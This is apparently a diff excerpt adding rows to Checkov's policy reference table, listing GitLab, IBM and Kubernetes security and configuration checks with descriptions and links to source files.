+| 2661 | CKV_GITLABCI_3 | jobs | *.services[] | Detecting image usages in gitlab workflows | gitlab_ci | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/DetectImagesUsage.py) |
+| 2662 | CKV_GLB_1 | resource | gitlab_project | Ensure at least two approving reviews are required to merge a GitLab MR | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py) |
+| 2663 | CKV_GLB_2 | resource | gitlab_branch_protection | Ensure GitLab branch protection rules does not allow force pushes | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py) |
+| 2664 | CKV_GLB_3 | resource | gitlab_project | Ensure GitLab prevent secrets is enabled | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py) |
+| 2665 | CKV_GLB_4 | resource | gitlab_project | Ensure GitLab commits are signed | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py) |
+| 2666 | CKV2_IBM_1 | resource | ibm_is_lb | Ensure load balancer for VPC is private (disable public access) | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml) |
+| 2667 | CKV2_IBM_2 | resource | ibm_is_vpc | Ensure VPC classic access is disabled | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml) |
+| 2668 |
CKV2_IBM_3 | resource | ibm_iam_account_settings | Ensure API key creation is restricted in account settings | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml) | +| 2669 | CKV2_IBM_4 | resource | ibm_iam_account_settings | Ensure Multi-Factor Authentication (MFA) is enabled at the account level | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml) | +| 2670 | CKV2_IBM_5 | resource | ibm_iam_account_settings | Ensure Service ID creation is restricted in account settings | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml) | +| 2671 | CKV2_IBM_7 | resource | ibm_container_cluster | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml) | +| 2672 | CKV_K8S_1 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host process ID namespace | Kubernetes | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPIDPSP.py) | +| 2673 | CKV_K8S_1 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py) | +| 2674 | CKV_K8S_2 | resource | PodSecurityPolicy | Do not admit privileged containers | Kubernetes | 
[PrivilegedContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainersPSP.py) | +| 2675 | CKV_K8S_2 | resource | kubernetes_pod_security_policy | Do not admit privileged containers | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py) | +| 2676 | CKV_K8S_3 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host IPC namespace | Kubernetes | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPCPSP.py) | +| 2677 | CKV_K8S_3 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py) | +| 2678 | CKV_K8S_4 | resource | PodSecurityPolicy | Do not admit containers wishing to share the host network namespace | Kubernetes | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespacePSP.py) | +| 2679 | CKV_K8S_4 | resource | kubernetes_pod_security_policy | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py) | +| 2680 | CKV_K8S_5 | resource | PodSecurityPolicy | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalationPSP.py) | +| 2681 | CKV_K8S_5 | resource | kubernetes_pod_security_policy | Containers should not run with allowPrivilegeEscalation | Terraform | 
[AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py) | +| 2682 | CKV_K8S_6 | resource | PodSecurityPolicy | Do not admit root containers | Kubernetes | [RootContainersPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainersPSP.py) | +| 2683 | CKV_K8S_6 | resource | kubernetes_pod_security_policy | Do not admit root containers | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py) | +| 2684 | CKV_K8S_7 | resource | PodSecurityPolicy | Do not admit containers with the NET_RAW capability | Kubernetes | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilitiesPSP.py) | +| 2685 | CKV_K8S_7 | resource | kubernetes_pod_security_policy | Do not admit containers with the NET_RAW capability | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py) | +| 2686 | CKV_K8S_8 | resource | DaemonSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2687 | CKV_K8S_8 | resource | Deployment | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2688 | CKV_K8S_8 | resource | DeploymentConfig | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2689 | CKV_K8S_8 | resource | Pod | Liveness Probe Should be Configured | Kubernetes | 
[LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2690 | CKV_K8S_8 | resource | PodTemplate | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2691 | CKV_K8S_8 | resource | ReplicaSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2692 | CKV_K8S_8 | resource | ReplicationController | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2693 | CKV_K8S_8 | resource | StatefulSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | +| 2694 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2695 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2696 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 2697 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | +| 
2698 | CKV_K8S_9 | resource | DaemonSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2699 | CKV_K8S_9 | resource | Deployment | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2700 | CKV_K8S_9 | resource | DeploymentConfig | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2701 | CKV_K8S_9 | resource | Pod | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2702 | CKV_K8S_9 | resource | PodTemplate | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2703 | CKV_K8S_9 | resource | ReplicaSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2704 | CKV_K8S_9 | resource | ReplicationController | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2705 | CKV_K8S_9 | resource | StatefulSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | +| 2706 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | 
[ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2707 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2708 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2709 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | +| 2710 | CKV_K8S_10 | resource | CronJob | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2711 | CKV_K8S_10 | resource | DaemonSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2712 | CKV_K8S_10 | resource | Deployment | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2713 | CKV_K8S_10 | resource | DeploymentConfig | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2714 | CKV_K8S_10 | resource | Job | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2715 | CKV_K8S_10 | resource | Pod | CPU requests should be set | Kubernetes 
| [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2716 | CKV_K8S_10 | resource | PodTemplate | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2717 | CKV_K8S_10 | resource | ReplicaSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2718 | CKV_K8S_10 | resource | ReplicationController | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2719 | CKV_K8S_10 | resource | StatefulSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2720 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2721 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2722 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2723 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2724 | CKV_K8S_11 | resource | CronJob | CPU limits should be set | Kubernetes | 
[CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2725 | CKV_K8S_11 | resource | DaemonSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2726 | CKV_K8S_11 | resource | Deployment | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2727 | CKV_K8S_11 | resource | DeploymentConfig | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2728 | CKV_K8S_11 | resource | Job | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2729 | CKV_K8S_11 | resource | Pod | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2730 | CKV_K8S_11 | resource | PodTemplate | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2731 | CKV_K8S_11 | resource | ReplicaSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2732 | CKV_K8S_11 | resource | ReplicationController | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2733 | CKV_K8S_11 | resource | StatefulSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2734 | 
CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2735 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2736 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2737 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2738 | CKV_K8S_12 | resource | CronJob | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2739 | CKV_K8S_12 | resource | DaemonSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2740 | CKV_K8S_12 | resource | Deployment | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2741 | CKV_K8S_12 | resource | DeploymentConfig | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2742 | CKV_K8S_12 | resource | Job | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2743 | CKV_K8S_12 
| resource | Pod | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2744 | CKV_K8S_12 | resource | PodTemplate | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2745 | CKV_K8S_12 | resource | ReplicaSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2746 | CKV_K8S_12 | resource | ReplicationController | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2747 | CKV_K8S_12 | resource | StatefulSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2748 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2749 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2750 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2751 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | 
[MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2752 | CKV_K8S_13 | resource | CronJob | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2753 | CKV_K8S_13 | resource | DaemonSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2754 | CKV_K8S_13 | resource | Deployment | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2755 | CKV_K8S_13 | resource | DeploymentConfig | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2756 | CKV_K8S_13 | resource | Job | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2757 | CKV_K8S_13 | resource | Pod | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2758 | CKV_K8S_13 | resource | PodTemplate | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2759 | CKV_K8S_13 | resource | ReplicaSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2760 | CKV_K8S_13 | resource | ReplicationController | Memory limits should be set | Kubernetes | 
[MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2761 | CKV_K8S_13 | resource | StatefulSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2762 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2763 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2764 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2765 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2766 | CKV_K8S_14 | resource | CronJob | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2767 | CKV_K8S_14 | resource | DaemonSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2768 | CKV_K8S_14 | resource | Deployment | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 
2769 | CKV_K8S_14 | resource | DeploymentConfig | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2770 | CKV_K8S_14 | resource | Job | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2771 | CKV_K8S_14 | resource | Pod | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2772 | CKV_K8S_14 | resource | PodTemplate | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2773 | CKV_K8S_14 | resource | ReplicaSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2774 | CKV_K8S_14 | resource | ReplicationController | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2775 | CKV_K8S_14 | resource | StatefulSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2776 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2777 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should 
be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2778 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2779 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2780 | CKV_K8S_15 | resource | CronJob | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2781 | CKV_K8S_15 | resource | DaemonSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2782 | CKV_K8S_15 | resource | Deployment | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2783 | CKV_K8S_15 | resource | DeploymentConfig | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2784 | CKV_K8S_15 | resource | Job | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2785 | CKV_K8S_15 | resource | Pod | Image Pull Policy should be Always | Kubernetes | 
